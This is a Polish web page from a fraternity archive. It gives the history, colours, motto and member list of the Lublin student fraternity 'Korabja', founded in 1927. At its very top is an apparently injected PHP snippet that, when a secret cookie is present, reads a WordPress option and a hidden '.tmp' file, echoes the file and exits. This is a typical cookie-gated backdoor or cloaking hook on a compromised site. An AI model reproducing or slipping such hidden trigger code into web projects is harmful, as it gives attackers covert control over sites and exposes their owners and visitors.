if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Korabja

Dekiel Eugeniusza Pinkosza. Nazwa:
Polska Akademicka Korporacja “Korabja”
Siedziba:
Lublin
Data powstania:
3 V 1927 r.
Barwy:
amarantowa – złota – biała (symbolika barw: umiłowanie idei – bogactwo płynące z posiadania morza – czystość i szlachetność w postępowaniu)
Dewiza:
„Braterstwa ogniwem spięci, zdejmijmy z serca zasłonę”

Rys historyczny

Dekiel balowy Bogusława Salnickiego

Korabja została założona dnia 3 V 1927 r. Miała powstać z połączenia Romy Lubliniensis i Konfederacji, dwóch nielicznych istniejących na Uniwersytecie Lubelskim korporacji o orientacji katolickiej (?). Celem korporacji było wychowywanie młodzieży akademickiej na wiernych synów Kościoła i Ojczyzny, w duchu zasad chrześcijańskich przy zachowaniu zwyczajów i tradycji korporacyjnych. Skutkowało to w odrzuceniu wszelkich form pojedynków i zakazie w nich uczestniczenia.

Od grudnia 1927 r. Korabia należała do Zjednoczenia Polskich Akademickich Korporacji Chrześcijańskich.

Okładka zaproszenia na Bal Morski, 1931 r.

Szczególnym celem Korabji było propagowanie “idei morskiej”, w szczególności poprzez upowszechnianie w społeczeństwie świadomości znaczenia morza dla rozwoju Rzeczypospolitej. Realizowało się to poprzez pracę społeczną na terenie akademickim oraz w organizacjach związanych z morzem, a w szczególności z Ligą Morską i Rzeczną (później przemianowaną na Ligę Morską i Kolonialną). Wraz z Ligą Korabja organizowała także „Bale Morskie” - najbardziej ekskluzywne bale w latach 30-tych w Lublinie.

Komers VII-lecia Korabji, Lublin 3 V 1934 r.

Członkowie Korabji wyróżniali się zaangażowaniem w pracy społecznej na Uniwersytecie. Przez sześć lat pełnili funkcję prezesów Bratniej Pomocy Studentów KUL. Korabja blisko współpracowała ze Stowarzyszeniem Katolickiej Młodzieży Akademickiej “Odrodzenie”. Także w tym Stowarzyszeniu przez sześć lat członkowie Korabji zajmowali stanowisko prezesa. Z inicjatywy Korabji w 1931 r. reanimowano Chór Akademicki KUL, w którym funkcje prezesów pełnili w kolejnych latach członkowie korporacji.

Komers XI-lecia Korabji, Lublin 3 V 1938 r.

W latach 1931-33 działała we Lwowie filia Korabji.

Zawarła kartele z K! Laudania z Warszawy, wieczysty z K! Constantia z Krakowa oraz z K! Conradia z Wilna.

Całkowita ustalona, niemal kompletnej imienna lista członków obejmuje 104 nazwiska, w tym siedmiu członków honorowych. W 1938 r. korporacja liczyła 84 członków, w tym siedmiu członków honorowych.

Po wojnie odbywały się spotkania niewielkiej grupy członków Korporacji.

Smykówka, Lublin 20 X 1937 r.

Lista członków

Poniższa, niekompletna lista członków Korabji obejmuje ponad sto nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

Członkowie honorowi

 1. Ignacy Czuma, (22 października 1891 w Niepołomicach - 18 kwietnia 1963 w Lublinie) dr praw UJ 1922, habilitacja 1924, prof. prawa i skarbowości, dziekan Wydziału Prawa i Nauk Społeczno-Ekonomicznych KUL 1926-28, prorektor 1938–39, Filister honorowy Korabji, od 1930 poseł na Sejm II RP (z listy BBWR jako przedstawiciel Polskiego Stronnictwa Katolicko-Ludowego), współautor konstytucji kwietniowej, 1939-40 więziony przez Niemców na Zamku Lubelskim, po zwolnieniu prowadził tajne nauczanie w Niepołomicach, szambelan papieski 1949, więziony przez władze PRL 1950–53 za związki z WIN-em, autor licznych prac z dziedziny prawa, filozofii i skarbowości
 2. Henryk Dembiński, prof. KUL, Filister honorowy Korabji, po wojnie prezes wojewódzkiego oddziału Stronnictwa Pracy w Lublinie
 3. Ludwik Górski, (1894-1945) ekonomista, działacz katolicki, prof. KUL , Filister honorowy Korabji
 4. Stefan Iwanowski, (12 grudnia 1890 - 1954 w Sztokholmie), s. Edwarda i Natalii Ueberschaer, płk dypl., zastępca dowódcy Korpusu II w Lublinie, Filister honorowy Korabji, w 1939 przewodniczący kapituły Krzyża Ligi Morskiej i Kolonialnej “Pro Mari Nostro”, w wojnie obronnej 1939 dowódca grupy kawalerii w Dowództwie Obrony Obszaru Lwowa, w niewoli niemieckiej w obozie w Woldenbergu, jeden z dowódców tajnej organizacji wojskowej w obozie
 5. Piotr Kałwa, (18 października 1893 - 7 lipca 1974) od 1916 ksiądz katolicki, studiował prawo i teologię KUL, od 1935 prof. KUL, Filister honorowy Korabji, więziony przez Niemców 1939-40, od 1945 prof. prawa kanonicznego KUL, od 1949 biskup lubelski, Wielki Kanclerz KUL 1949-74, członek Rady Głównej Episkopatu Polski, pochowany w archikatedrze lubelskiej
 6. Roman Leśnikowski, adwokat Izby Lubelskiej, Filister honorowy Korabji
 7. Stefan Smólski, (2 października 1879 - 2 lutego 1938 w Warszawie) prawnik, adwokat, działacz i polityk chadecki, poseł na Sejm Ustawodawczy 1919-22, senator 1922-26, wiceprezydent Warszawy 1921-22, minister pracy i opieki społecznej 1923 oraz minister spraw wewnętrznych 1926, Filister honorowy Korabji

Członkowie rzeczywiści

 1. Jan Baćmaga,
 2. Ferdynand Bator,
 3. Stefan Bator,
 4. Bogdan Biernacki,
 5. Stanisław Bogusz,
 6. Marian Borek,
 7. Czesław Browiński,
 8. Józef Bryda, ( - 17 lipca 1996 w Chislehurst w Anglii) prezes 1929/30, po wojnie na emigracji w Wielkiej Brytanii

  Zygmunt Brzóz, 1937 r.

 9. Zygmunt Brzóz, po wojnie na emigracji w Australii

 10. Stanisław Bryłowski,
 11. Hieronim Chrzczonowicz,
 12. Stefan Czajka,
 13. Stanisław hr. Czapski,
 14. Marian Czuma,
 15. Kazimierz Draniewicz,
 16. Zbigniew Draniewicz,
 17. Władysław Dunaj,
 18. Adolf Dzyr,
 19. Józef Fiema,
 20. Adam Florkiewicz, prezes 1933/34, prezes Bratniej Pomocy KUL
 21. Mieczysław Gawdzik, prawnik, notariusz na Kielecczyźnie
 22. Józef Ginalski,

  Władysław Grudzień, 1938 r.

 23. Władysław Grudzień, (1916 - listopad 2006) c. 1937, absolwent KUL, mgr ekonomii

 24. Marian Guckler-Wisłocki,

  Tadeusz Halliop, 1937 r.

 25. Tadeusz Halliop, (6 grudnia 1912 we wsi Osnówka nad Bugiem - 4 grudnia 1982 w Lublinie) s. Antoniego i Eugenii z d. Pieczyska, absolwent Gimnazjum im. Stefana Czarnieckiego w Chełmie Lubelskim 1932, student i absolwent prawa KUL 1932-37, prezes 1936/37, działacz Odrodzenia, m.in. prezes 1935/36 i wiceprezes 1936/37, red. i red. naczelny pisma “Nurty”, red. pisma “Odrodzenie”, prezes Bratniej Pomocy KUL 1935/36, po studiach aplikant sądowy, kierownik Biura Zarządu Wojewódzkiego Ligi Morskiej i Kolonialnej w Lublinie 1937-39, w czasie okupacji w AK, Polskim Czerwonym Krzyżu i Polskim Komitecie Opiekuńczym, w 1945 zdał egzamin sądowy, od 1947 adwokat, wieloletni sędzia Wojewódzkiej Komisji Dyscyplinarnej Izby Adwakackiej w Lublilnie, działacz chrześcijański, m.in. wiceprezes Zarządu Miejskiego Stronnictwa Pracy 1945-46, od 1947 członek Zarządu Głównego Towarzystwa Przyjaciół KUL, prezes Lubelskiego Oddziału Towarzystwa 1969-81

 26. Kazimierz Holtzer, prezes 1938/39
 27. Wawrzyniec Iwanek,
 28. Stanisław Jaroszyński, prezes 1930/31
 29. Stefan Jasiński,
 30. Adam Jurkiewicz, (4 grudnia 1910 - 21 sierpnia 2006) prezes 1932/33, prezes Koła Prawników KUL, mgr praw, adwokat
 31. Marian Keller,
 32. Zbigniew Kifner, prezes 1935/36
 33. Mieczysław Kleczyński, prezes 1927
 34. Marian Komecki,
 35. Franciszek Kowalski,
 36. Antoni Krawczyk,
 37. Józef Kumor,
 38. Tadeusz Kwiatkowski, prezes 1927/28
 39. Roman Leidner,
 40. Tadeusz Lesiak,
 41. Jan Maliszewski,
 42. Zygmunt Martyniak, prezes 1928/29, prezes Bratniej Pomocy KUL
 43. Lucjan Marynowski, prawnik, wiceprokurator Sądu Okręgowego w Warszawie
 44. Ernest Matura,
 45. Marian Męczyński,

  Marian Miąc, 1937 r.

 46. Marian Miąc, (1912-1999) prezes “Odrodzenia”

  Antoni Michalski, 1938 r.

 47. Antoni Michalski, ( - 2003) mgr praw, radca prawny

 48. Stanisław Michalski, mgr praw, adwokat
 49. Antoni Miszczuk, ( - 16 czerwca 1996 w Lublinie) mgr praw, adwokat
 50. Józef Nastaj,
 51. Antoni Niemczynowski,
 52. Roman Niewiarowski,
 53. Karol Nowosadzki,

  Stanisław Olkowski, 1938 r.

 54. Stanisław Olkowski, prezes Bratniej Pomocy KUL

  Kazimierz Osuchowski, druga poł. lat 30.

 55. Kazimierz Osuchowski, (13 stycznia 1915 - 9 sierpnia 1944 w Warszawie) herbu Gozdawa, s. Bogusława (sędziego) i Marii z Migurskich h. Prus III, absolwent Państwowego Gimnazjum Męskiego im. Stanisława Staszica w Lublinie, student i absolwent 1938 prawa KUL (mgr praw), prezes 1937/38, prezes Stowarzyszenia Katolickiej Młodzieży Akademickiej “Odrodzenie”, służba wojskowa 1936-37 w 22 Pułku Piechoty w Łukcku i 50 Pułku Piechoty Strzelców Kresowych w Maniewiczach, po studiach luty-październik 1939 urzędnik konsuatu generalnego RP w Chicago, od listopada 1939 w PSZ we Francji, m.in. udział w kampanii norwerskiej i bitwie o Nrawik, później PSZ w Wielkiej Brytanii, m.in. I Baon Strzelców Podhalańskich w Dumfermline, II Baon I Dywizji Grenadierów, Oddział Personalny Sztabu Naczelnego Wodza, od maja 1944 w AK, w Oddziale V Komendy Głównej AK w Baonie “Miłosz” w Powstaniu Warszawskim, gdzie poległ, pochowanych na Powązkach w Warszawie, odznaczony Virtuti Militari, dwukrotnie Krzyżem Walecznych, Croix de Guerre z gwiadą srebrną [Źródła (poza wskazanymi poniżej spisu czlonków): relacja Jarosława Tymowskiego]

 56. Zygmunt Pełczyński,

  Eugeniusz Pinkosz, 1938 r.

 57. Eugeniusz Pinkosz, (14 grudnia 1911 w Lublinie - 27 marca 1999 w Olsztynie) mgr praw, adwokat

 58. Leon Pokrywka, prezes Bratniej Pomocy KUL
 59. Polanowski,
 60. Jan Prokopowicz,
 61. Zbigniew Padzikowski,
 62. Tadeusz Rodziński,
 63. Tadeusz Rogalski,
 64. Czesław Rożenek (Rozenek),
 65. Jan Różycki,
 66. Stanisław Safader,
 67. Bogusław Salnicki, (1915-2007) c. 1935/36, mgr praw, adwokat
 68. Bolesław Sałyga, prezes 1931/32, prezes Chóru Akademickiego KUL 1931
 69. Bolesław Samolej,
 70. Tadeusz Skulimowski,
 71. Eugeniusz Smorczewski,
 72. Aleksander Sobieszek,

  Sokołowski, 1934 r.

 73. Sokołowski (?), kpt.

 74. Antoni Soroka, (1913-2002) prezes “Odrodzenia”, mgr praw, adwokat
 75. Sergiusz Stankiewicz,
 76. Wacław Stopa,
 77. Bolesław Strużak,
 78. Bronisław Sygut,
 79. Lucjan Świętnicki, prezes Chóru Akademickiego KUL 1932
 80. Lucjan Tacikowski,
 81. Stanisław Tomala,
 82. Rudolf Trocha,
 83. Władysław Tuderek,
 84. Jan Turowski, (1917 - ) brat Konstantego (Korabia), prof. socjologii KUL
 85. Konstanty Turowski, (1907-1983) brat Jana (Korabia), prezes Koła Ekonomistów, prezes “Odrodzenia”
 86. Aleksander Wajrak, prezes 1934/35, prezes Bratniej Pomocy KUL, prezes “Odrodzenia”
 87. Józef Walczyński,
 88. Wacław Wawrykiewicz,
 89. Tadeusz Wawrzynowicz,
 90. Maciej Wierzyński,

  Edmund Wirski, ok. 1937 r.

 91. Edmund Wirski, ( - 2003 w Lublinie) c. 1937, absolwent KUL, mgr praw, adwokat

 92. Wacław Wolff, mgr praw
 93. Stanisław Zachwieja,

  Henryk Zajączkowski, 1937 r.

 94. Henryk Zajączkowski,

 95. Ryszard Żbikowski,
 96. Antoni Żelkowski,
 97. Wacław Żurawski,

Pieczęć Korabji, 1931 r.

Listę członków opracowano na podstawie:

1) Adam Jurkiewicz, Lista członków Polskiej Akademickiej Korporacji Korabja (Lublin), maszynopis,
2) innych materiałów archiwalnych z Archiwum Korporacyjnego,
3) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków Korporacji Korabia.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 12 IX 2007 r.
Ostatnia zmiana: 6 IX 2016 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Korporacja Korabja (Lublin), (na:) www.archiwumkorporacyjne.pl, stan 6 IX 2016 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }